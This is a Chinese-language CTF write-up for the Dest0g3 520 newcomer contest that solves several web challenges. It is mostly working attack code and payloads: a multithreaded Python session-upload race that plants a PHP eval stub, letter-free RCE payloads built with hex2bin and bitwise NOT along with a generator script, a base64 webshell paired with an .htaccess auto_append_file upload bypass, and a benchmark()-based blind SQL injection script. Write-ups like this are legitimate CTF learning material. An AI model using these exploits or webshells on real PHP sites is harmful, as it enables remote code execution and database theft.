
Dest0g3 520迎新賽

2022-06-13 08:18:00 XINO丶

這兩天期末,發點存貨
phpdest
文件競爭

import requests
import io
import threading
# Challenge instance under test and the session id whose file the race targets.
url = "http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/"
sessionID = "flag"
# POST body the reader threads send once the included session file holds the eval stub.
data = {"cmd": "system('cat flag.php');"}
def write(session: requests.Session) -> None:
    """Upload worker: keep the target's session file populated with attacker text.

    Every iteration sends a multipart upload that also carries a
    ``PHP_SESSION_UPLOAD_PROGRESS`` form field and a ``PHPSESSID`` cookie equal
    to the module-level ``sessionID``. With PHP's ``session.upload_progress``
    feature enabled, the server stores the field value in that session file for
    the duration of the upload and, with ``session.upload_progress.cleanup`` on,
    removes it when the upload finishes; looping forever keeps re-opening that
    short window for a concurrent reader. The function never returns and the
    response is discarded.

    Defensive note: this primitive needs both upload-progress tracking and a
    separate file-inclusion bug that reads ``/tmp/sess_*``; closing either one
    removes the race.
    """
    while True:
        # 50 KiB body; presumably sized to stretch the upload window — TODO confirm.
        f = io.BytesIO(b'a'*1024*50)
        resp = session.post(url=url,data={
    'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={
    'file':('flag.txt',f)},cookies={
    'PHPSESSID':sessionID})
def read(session: requests.Session) -> None:
    """Reader worker: include the session file repeatedly and watch for a hit.

    Posts the module-level ``data`` (``cmd=system('cat flag.php');``) to
    ``?file=/tmp/sess_flag`` — the session file for ``sessionID`` — so that, if
    the file currently contains the ``eval`` stub planted by ``write``, the
    inclusion executes it. The marker ``'flag.txt'`` is the upload filename
    used by ``write``; presumably PHP records it in the progress entry, so its
    presence in the response means the session file was included while it
    existed. On a hit the body is printed and the module-level ``event`` is
    cleared, but nothing ever waits on that event, so this loop and the other
    threads keep running. ``event`` is only created under ``__main__``, so a
    hit reached through a plain import raises ``NameError`` here. On a miss the
    response is discarded and a retry marker is printed.
    """
    while True:
        resp = session.post(url='http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/?file=/tmp/sess_flag',data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("=========retry==========")
if __name__ == "__main__":
    # Created here only, so `read` can reach it solely when run as a script.
    event = threading.Event()
    # One shared requests session for all workers. The `with` block exits as soon
    # as the threads are started, i.e. the session is closed while they are still
    # using it — NOTE(review): looks unintended; confirm.
    with requests.session() as session:
        for i in range(1,5):   # four upload workers
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1,5):   # four reader workers
            threading.Thread(target=read, args=(session,)).start()
    # Set after the threads are running; nothing waits on the event, so this does
    # not stop them. The script has to be interrupted by hand.
    event.set()

EasyPHP

set_error_handler(
    function() use(&$fl4g) {
    
        print $fl4g;
    }

數組報錯然後輸出 flag
ctf[]=123

SimpleRCE
hex2bin 繞過
https://www.pudn.com/news/62809145ebb030486d479342.html
可以看一下,裏面有
最後執行的是
aaa=hex2bin('73797374656d')('head /f*')

另一種方法
法二
最開始考慮的是無字母 RCE,但發現或運算和異或運算都被 ban 了,所以考慮用 URL 編碼取反繞過

<?php
// Payload helper: reads a function name and an argument from stdin and prints a
// PHP expression of the form (~"func")(~"arg"); with both strings bitwise-NOTed
// and URL-encoded. PHP's ~ inverts every byte, so the decoded bytes are all
// >= 0x80 and contain no letters, digits, "|" or "^"; (~$s)(...) then calls the
// function named by the restored string. The example on this page is
// (~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);
// Defensive note: a character blocklist cannot close this; only not passing
// user input to eval()/dynamic calls does.

fwrite(STDOUT,'[+]your function: ');

// Read one line and strip the trailing line ending (CRLF, CR or LF).
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

fwrite(STDOUT,'[+]your command: ');

// Same normalisation for the argument string.
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

// Output is the final expression; the "[*] " prefix is a label, not part of the payload.
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
payload
aaa=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

funny_upload
對文件類型進行了檢測,改為 jpg 文件後,又對文件內容進行了檢測,不能有 <?,所以采用了 base64 結合 .htaccess 偽協議的方式進行繞過

1.jpg
PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+
.htaccess
SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg

上傳成功後用蟻劍連接即可
Really Easy SQL
SQL 盲注,sleep 被過濾,改用 benchmark 代替

import requests
import time
# Challenge instance and the value recovered so far, one character per outer loop.
url="http://fec87fc0-85b0-4969-a9d2-7328b18dc98b.node4.buuoj.cn:81/"
flag=''
# Time-based blind SQL injection through the login form. sleep() is filtered on
# the target, so benchmark(2000000,md5(1)) supplies the delay instead, and whether
# the request exceeds the 1.5 s timeout is the boolean oracle. Each character is
# located by binary search over ASCII 32..127, for up to 49 positions.
# Defensive note: a filter that only blocks sleep() does not help; the fix is a
# parameterized login query. The traffic pattern — bursts of near-identical POSTs
# alternating between fast replies and timeouts, with DB CPU spikes — is what a
# detection rule would key on.
for i in range(1,50):
    m=32    # lower bound: character is known to be >= m
    n=127   # upper bound: character is known to be < n
    while 1:
        mid=(m+n)//2

        # Earlier stages of the same search (their results are noted at line end).
        #payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #flaggg,user
        #payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #cmd
        # if(ascii(char) < mid) -> benchmark (slow), else 0 (fast).
        payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid)
        data={
    
        'username': 'a',
        'password': payload
        }
        print(data)   # echoes every probe
        try:
           r = requests.post(url=url,data=data,timeout=1.5)
           m=mid   # answered in time: condition false, character >= mid
        except:
            # A timeout means the condition held (character < mid). The bare
            # except treats any other failure — connection reset, KeyboardInterrupt —
            # the same way, so one dropped request is recorded as a wrong character.
            n=mid
        if(m+1==n):
            flag+=chr(m)   # bounds have converged on a single code point
            print(flag)
            break
        time.sleep(0.2)   # pacing between probes
    time.sleep(1)   # pacing between characters